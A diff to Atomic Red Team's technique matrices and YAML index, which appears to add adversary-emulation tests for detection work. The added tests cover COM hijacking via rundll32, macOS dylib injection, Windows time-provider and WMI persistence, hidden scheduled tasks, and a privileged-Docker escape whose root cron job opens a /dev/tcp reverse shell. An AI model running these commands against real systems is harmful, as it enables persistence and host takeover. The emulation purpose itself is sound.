+| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) |  | Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |

atomics/Indexes/Matrices/matrix.md

@@ -88,7 +88,7 @@
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Systemd Timers](../../T1053.006/T1053.006.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
+|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | [Screensaver](../../T1546.002/T1546.002.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Security Support Provider](../../T1547.005/T1547.005.md) | [Trap](../../T1546.005/T1546.005.md) | [Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | [Msiexec](../../T1218.007/T1218.007.md) |  |  |  |  |  |  |  |
@@ -100,7 +100,7 @@
 |  |  | [Systemd Service](../../T1543.002/T1543.002.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |
 |  |  | [Systemd Timers](../../T1053.006/T1053.006.md) |  | [Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
 |  |  | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
-|  |  | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Pass the Hash](../../T1550.002/T1550.002.md) |  |  |  |  |  |  |  |
+|  |  | [Time Providers](../../T1547.003/T1547.003.md) |  | [Pass the Hash](../../T1550.002/T1550.002.md) |  |  |  |  |  |  |  |
 |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
 |  |  | [Transport Agent](../../T1505.002/T1505.002.md) |  | [Password Filter DLL](../../T1556.002/T1556.002.md) |  |  |  |  |  |  |  |
 |  |  | [Trap](../../T1546.005/T1546.005.md) |  | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |

atomics/Indexes/Matrices/windows-matrix.md

@@ -63,7 +63,7 @@
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
+|  |  | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | [Screensaver](../../T1546.002/T1546.002.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [Security Support Provider](../../T1547.005/T1547.005.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
 |  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
@@ -71,7 +71,7 @@
 |  |  | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Shortcut Modification](../../T1547.009/T1547.009.md) |  | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
 |  |  | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
-|  |  | Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Msiexec](../../T1218.007/T1218.007.md) |  |  |  |  |  |  |  |
+|  |  | [Time Providers](../../T1547.003/T1547.003.md) |  | [Msiexec](../../T1218.007/T1218.007.md) |  |  |  |  |  |  |  |
 |  |  | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [NTFS File Attributes](../../T1564.004/T1564.004.md) |  |  |  |  |  |  |  |
 |  |  | [Transport Agent](../../T1505.002/T1505.002.md) |  | [Network Share Connection Removal](../../T1070.005/T1070.005.md) |  |  |  |  |  |  |  |
 |  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Obfuscated Files or Information](../../T1027/T1027.md) |  |  |  |  |  |  |  |

atomics/Indexes/index.yaml

@@ -13910,6 +13910,49 @@ privilege-escalation:
 
           '
         name: powershell
+    - name: COM Hijacking with RunDLL32 (Local Server Switch)
+      auto_generated_guid: 123520cc-e998-471b-a920-bd28e3feafa0
+      description: "This test uses PowerShell to hijack a reference to a Component
+        Object Model by creating registry values under InprocServer32 key in the HKCU
+        hive then calling the Class ID to be executed via \"rundll32.exe -localserver
+        [clsid]\". \nThis method is generally used as an alternative to 'rundll32.exe
+        -sta [clsid]' to execute dll's while evading detection. \nReference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/\nUpon
+        successful execution of this test with the default options, whenever certain
+        apps are opened (for example, Notepad), a calculator window will also be opened. "
+      supported_platforms:
+      - windows
+      input_arguments:
+        clsid_threading:
+          description: Threading Model
+          type: string
+          default: Both
+        dll_path:
+          description: Path to the DLL.
+          type: String
+          default: "$env:temp\\T1546.015_calc.dll"
+        clsid:
+          description: Class ID to hijack.
+          type: string
+          default: "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}"
+        clsid_description:
+          description: Description for CLSID
+          type: string
+          default: MSAA AccPropServices
+      dependency_executor_name: powershell
+      dependencies:
+      - description: DLL For testing
+        prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}'
+        get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015_calc.dll"
+          -OutFile "#{dll_path}"
+      executor:
+        command: |-
+          New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
+          New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value #{dll_path}
+          New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
+          Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-localserver #{clsid}'
+        cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
+          -Recurse -ErrorAction Ignore
+        name: powershell
   T1053.007:
     technique:
       object_marking_refs:
@@ -15248,6 +15291,47 @@ privilege-escalation:
 
           '
         name: bash
+    - name: Dylib Injection via DYLD_INSERT_LIBRARIES
+      auto_generated_guid: 4d66029d-7355-43fd-93a4-b63ba92ea1be
+      description: 'injects a dylib that opens calculator via env variable
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        file_to_inject:
+          description: Path of executable to be injected. Mostly works on non-apple
+            default apps.
+          type: Path
+          default: "/Applications/Firefox.app/Contents/MacOS/firefox"
+        source_file:
+          description: Path of c source file
+          type: Path
+          default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c
+        dylib_file:
+          description: Path of dylib file
+          type: Path
+          default: "/tmp/T1574006MOS.dylib"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Compile the dylib from (#{source_file}). Destination is #{dylib_file}
+
+          '
+        prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file}
+
+          '
+        get_prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file}
+
+          '
+      executor:
+        command: 'DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
+
+          '
+        cleanup_command: |
+          kill `pgrep Calculator`
+          kill `pgrep firefox`
+        name: bash
+        elevation_required: false
   T1055.001:
     technique:
       object_marking_refs:
@@ -15661,6 +15745,107 @@ privilege-escalation:
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 
           '
+    - name: Mount host filesystem to escape privileged Docker container
+      auto_generated_guid: 6c499943-b098-4bc6-8d38-0956fc182984
+      description: "This technique abuses privileged Docker containers to mount the
+        host's filesystem and then create a cron job to launch a reverse shell as
+        the host's superuser.\nThe container running the test needs be privileged.
+        \ It may take up to a minute for this to run due to how often crond triggers
+        a job.\nDev note: the echo to create cron_filename is broken up to prevent
+        localized execution of hostname and id by Powershell. \n"
+      supported_platforms:
+      - containers
+      input_arguments:
+        mount_device:
+          description: Path to the device of the host's disk to mount
+          type: Path
+          default: "/dev/dm-0"
+        mount_point:
+          description: Path where the host filesystem will be mounted
+          type: Path
+          default: "/mnt/T1611.002"
+        cron_path:
+          description: Path on the host filesystem where cron jobs are stored
+          type: Path
+          default: "/etc/cron.d"
+        cron_filename:
+          description: Filename of the cron job in cron_path
+          type: String
+          default: T1611_002
+        listen_address:
+          description: IP address to listen for callback from the host system.
+          type: String
+          default: "`ifconfig eth0 | grep inet | awk '{print $2}'`"
+        listen_port:
+          description: TCP Port to listen on for callback from the host system.
+          type: String
+          default: 4444
+      dependency_executor_name: sh
+      dependencies:
+      - description: Verify mount is installed.
+        prereq_command: 'which mount
+
+          '
+        get_prereq_command: 'if [ "" == "`which mount`" ]; then echo "mount Not Found";
+          if [ -n "`which apt-get`" ]; then sudo apt-get -y install mount ; elif [
+          -n "`which yum`" ]; then sudo yum -y install mount ; fi ; else echo "mount
+          installed"; fi
+
+          '
+      - description: Verify container is privileged.
+        prereq_command: 'capsh --print | grep cap_sys_admin
+
+          '
+        get_prereq_command: 'if [ "`capsh --print | grep cap_sys_admin`" == "" ];
+          then echo "Container not privileged.  Re-start container in insecure state.  Docker:
+          run with --privileged flag.  Kubectl, add securityContext: privileged: true";
+          fi
+
+          '
+      - description: Verify mount device (/dev/dm-0) exists.
+        prereq_command: 'ls #{mount_device}
+
+          '
+        get_prereq_command: 'if [ ! -f #{mount_device} ]; then echo "Container not
+          privileged or wrong device path.  Re-start container in insecure state.  Docker:
+          run with --privileged flag.  Kubectl, add securityContext: privileged: true";
+          fi
+
+          '
+      - description: Netcat is installed.
+        prereq_command: 'which netcat
+
+          '
+        get_prereq_command: 'if [ "" == "`which netcat`" ]; then echo "netcat Not
+          Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install netcat
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install netcat ; fi
+
+          '
+      - description: IP Address is known.
+        prereq_command: 'if [ "#{listen_address}" != "" ]; then echo "Listen address
+          set as #{listen_address}" ; fi
+
+          '
+        get_prereq_command: 'if [ "" == "`which ifconfig`" ]; then echo "ifconfig
+          Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install net=tools
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install net-tools ; fi
+
+          '
+      executor:
+        name: sh
+        elevation_required: true
+        command: |
+          if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
+          echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
+          echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
+          echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
+          echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
+          echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
+          netcat -l -p #{listen_port} 2>&1
+        cleanup_command: |
+          rm #{mount_point}#{cron_path}/#{cron_filename}
+          umount #{mount_point}
+          rmdir #{mount_point}
   T1546:
     technique:
       object_marking_refs:
@@ -19880,6 +20065,24 @@ privilege-escalation:
           schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
           reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
         name: command_prompt
+    - name: Import XML Schedule Task with Hidden Attribute
+      auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
+      description: "Create an scheduled task that executes calc.exe after user login
+        from XML that contains hidden setting attribute. \nThis technique was seen
+        several times in tricbot malware and also with the targetted attack campaigne
+        the industroyer2.\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: true
+        command: |
+          $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml")
+          Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
+        cleanup_command: 'Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false
+          >$null 2>&1
+
+          '
   T1053:
     technique:
       object_marking_refs:
@@ -21344,7 +21547,56 @@ privilege-escalation:
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
         url: https://technet.microsoft.com/en-us/sysinternals/bb963902
-    atomic_tests: []
+      identifier: T1547.003
+    atomic_tests:
+    - name: Create a new time provider
+      auto_generated_guid: df1efab7-bc6d-4b88-8be9-91f55ae017aa
+      description: |
+        Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+        The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+        in C:\Users\Public\ as validation that the test is successful.
+
+        Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "Enabled" /d "1" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /t REG_DWORD /v "InputProvider" /d "1" /f
+          net start w32time
+        cleanup_command: |
+          net stop w32time
+          reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
+          rm -force C:\Users\Public\AtomicTest.dll
+        name: powershell
+        elevation_required: true
+    - name: Edit an existing time provider
+      auto_generated_guid: 29e0afca-8d1d-471a-8d34-25512fc48315
+      description: |
+        Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
+        The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
+        in C:\Users\Public\ as validation that the test is successful.
+
+        Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Copy-Item $PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll C:\Users\Public\AtomicTest.dll
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f
+          net start w32time
+        cleanup_command: |
+          net stop w32time
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Windows\SYSTEM32\w32time.DLL" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "0" /f
+          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "0" /f
+          rm -force C:\Users\Public\AtomicTest.dll
+        name: powershell
+        elevation_required: true
   T1134.001:
     technique:
       type: attack-pattern
@@ -21907,7 +22159,7 @@ privilege-escalation:
         source_name: Microsoft Register-WmiEvent
       identifier: T1546.003
     atomic_tests:
-    - name: Persistence via WMI Event Subscription
+    - name: Persistence via WMI Event Subscription - CommandLineEventConsumer
       auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0
       description: |
         Run from an administrator powershell window. After running, reboot the victim machine.
@@ -21922,13 +22174,13 @@ privilege-escalation:
       - windows
       executor:
         command: |
-          $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+          $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                           EventNameSpace='root\CimV2';
                           QueryLanguage="WQL";
                           Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
           $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
 
-          $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+          $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                           CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
           $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
 
@@ -21938,8 +22190,49 @@ privilege-escalation:
           }
           $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
         cleanup_command: |
-          $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
-          $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+          $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
+          $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
+          $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
+          $FilterConsumerBindingToCleanup | Remove-WmiObject
+          $EventConsumerToCleanup | Remove-WmiObject
+          $EventFilterToCleanup | Remove-WmiObject
+        name: powershell
+        elevation_required: true
+    - name: Persistence via WMI Event Subscription - ActiveScriptEventConsumer
+      auto_generated_guid: fecd0dfd-fb55-45fa-a10b-6250272d0832
+      description: |
+        Run from an administrator powershell window. After running, reboot the victim machine.
+        After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
+
+        Code references
+
+        https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                          EventNameSpace='root\CimV2';
+                          QueryLanguage="WQL";
+                          Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
+          $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
+
+          $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                          ScriptingEngine='VBScript';
+                          ScriptText='
+                          Set objws = CreateObject("Wscript.Shell")
+                          objws.Run "notepad.exe", 0, True
+                          '}
+          $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
+
+          $FilterToConsumerArgs = @{
+          Filter = $Filter;
+          Consumer = $Consumer;
+          }
+          $FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs
+        cleanup_command: |
+          $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
+          $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
           $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
           $FilterConsumerBindingToCleanup | Remove-WmiObject
           $EventConsumerToCleanup | Remove-WmiObject
@@ -28940,6 +29233,47 @@ defense-evasion:
 
           '
         name: bash
+    - name: Dylib Injection via DYLD_INSERT_LIBRARIES
+      auto_generated_guid: 4d66029d-7355-43fd-93a4-b63ba92ea1be
+      description: 'injects a dylib that opens calculator via env variable
+
+        '
+      supported_platforms:
+      - macos
+      input_arguments:
+        file_to_inject:
+          description: Path of executable to be injected. Mostly works on non-apple
+            default apps.
+          type: Path
+          default: "/Applications/Firefox.app/Contents/MacOS/firefox"
+        source_file:
+          description: Path of c source file
+          type: Path
+          default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c
+        dylib_file:
+          description: Path of dylib file
+          type: Path
+          default: "/tmp/T1574006MOS.dylib"
+      dependency_executor_name: bash
+      dependencies:
+      - description: 'Compile the dylib from (#{source_file}). Destination is #{dylib_file}
+
+          '
+        prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file}
+
+          '
+        get_prereq_command: 'gcc -dynamiclib #{source_file} -o #{dylib_file}
+
+          '
+      executor:
+        command: 'DYLD_INSERT_LIBRARIES=#{dylib_file} #{file_to_inject}
+
+          '
+        cleanup_command: |
+          kill `pgrep Calculator`
+          kill `pgrep firefox`
+        name: bash
+        elevation_required: false
   T1055.001:
     technique:
       object_marking_refs:
@@ -47450,6 +47784,49 @@ persistence:
 
           '
